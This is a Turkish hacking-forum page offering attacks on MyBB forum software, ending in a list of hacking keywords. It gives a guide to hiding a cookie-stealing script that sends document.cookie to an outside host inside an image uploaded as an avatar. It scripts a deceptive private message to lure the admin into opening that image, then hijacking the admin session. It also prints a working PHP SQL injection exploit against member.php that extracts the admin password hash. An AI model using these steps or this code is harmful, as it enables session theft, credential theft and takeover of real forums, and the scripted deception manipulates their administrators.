Gök Türk TeaM

Giris

 

 

MyBB Hack MyBBHack MyBB sql MyBB rfi Injection

>İlk başta bir not defteri açıyoruz ve aşağıdaki verdiğim kodları için yazıyoruz farklı kaydet diyip ''.jpg veyada .gif'' şeklinde yani resim formatında kaydedeceğiz.

 

kod : **********img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

Daha sonra siteye üye olup avatar bölümünden göz at diyip resmimizi göz at diyip yüklüyoruz.

Resmimiz forumlarda gözükmeyecektir.Sağ Tıklayıp Özelliklerden Resmin URL sini yani adresini seçip kopyalıyoruz.

Sonra admine özel mesaj gönderiyoruz ve şu tarz bir bilgi yazıyoruz:

'' Ya kardeş benim Her Tarafta kullandığım çok sevdiğim bir avatarım var ama senin sitende görükmüyor sorun nedir acaba avatarın linkini verdim aşağıda diyoruz. ve avatarın linkini koyuyoruz.''

admin linke tıkladığı zaman admin cookie* hash* userid falan hepsi buraya geliyor
giderek cookie editörü indiriyoruz. ve kendi bilgilerimizi değiştirip adamın bilgilerini giriyoruz kaydediyoruz tekrar siteye giriyoruz ve admin girişi yapıyoruz. Yada admin hash'ı ile n kırdıktan sonra adamın nick'i ve şifresi ile online oluyoruz.. olay bu kadar basit

-----------------------------------------------------------------------------------------------

..:[ MyBB member.php SQL Injection ]:..

<?php
// the example below will attack http://www.example.com/mybb/
echo 'Pass:' . get_pass('www.example.com', '/mybb', '');

function get_pass($host, $path, $dbprefix) {
$query[] = 'uid=' . urlencode ("1' UNION SELECT 10000, 200, password AS type FROM {$dbprefix}users WHERE uid=1 ORDER BY uid DESC/*");

$query = implode('&', $query);

$header = "POST $path/member.php?action=avatar HTTP/1.1\r\n";
$header .= "Host: $host\r\n";
$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
$header .= "Content-Length: " . strlen($query) . "\r\n\r\n";

$fp = fsockopen($host, 80, $errno, $errstr, 30);
fwrite($fp, $header . $query);

$allah = '';
while (!feof($fp)) {
$tmp = fgets($fp, 1024);
$allah .= $tmp;
}
fclose($fp);

preg_match('/\: ([a-z0-9]{32})/i', $allah, $matches);
if (empty($matches[1]) && empty($dbprefix)) {
preg_match('#FROM (\w+)avatars WHERE#i', $allah, $matches);
$dbprefix = $matches[1];
if (empty($dbprefix)) {
return 'Unable to obtain password';
}
$password = get_pass($host, $path, $dbprefix);
}
else {
$password = $matches[1];
}

return $password;
}

?>
Hack Anti Pkk , Domain Hack , Email Hack , Flood Ddos , Ftp Hack , Hack , Hack Sitesi , Hacker , Hack Prgoramları , Ldu Ve Seditio Hack , MSn Hack , Nuke Hack , Web Hack , CuteNewsHack , vBulletin Hack , Phpbb Hack , Smf Hack , Joomla Hack , MkPortal Hack , Vb Hack , phpBB3 Hack , MyBB Hack , XOOPS Hack , WordPress Hack , UseBB Hack , Heck , hack+hack , hack+hacker , TurkHacker